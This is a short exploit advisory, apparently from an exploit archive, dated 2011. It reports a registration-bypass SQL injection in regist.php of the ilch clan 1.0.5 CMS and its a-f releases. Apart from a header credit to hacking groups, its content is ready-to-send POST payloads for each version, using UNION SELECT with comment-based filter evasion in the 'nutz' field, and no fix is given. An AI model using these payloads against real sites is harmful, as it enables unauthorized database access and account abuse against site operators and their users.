ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility
2011-04-02 16:15:13-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/ _____ _ _ \
\ \_ \ | ___| |__ /
/ / /\/ |/ __| '_ \ \
\ /\/ /_ | | (__| | | | /
/ \____/ |_|\___|_| |_| \
\ Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php /
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
by
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/ \
\ ___ ___ ___ ___ _ _ _____ _ _ /
/| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ \
\|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| /
/ |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| \
\ |___| |___| /
/ \
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f!
Vulnerability Name : Registration Bypass SQL Injection Vulnerability
Date : 02.04.2011
SQL Injection method : $_POST
Discovered by : Easy Laster
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Security Flaws
=-=-=-=-=-=-=-=-=-=-=-=
ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
Fixes
No fixesIn order to submit a new fix you need to be registered.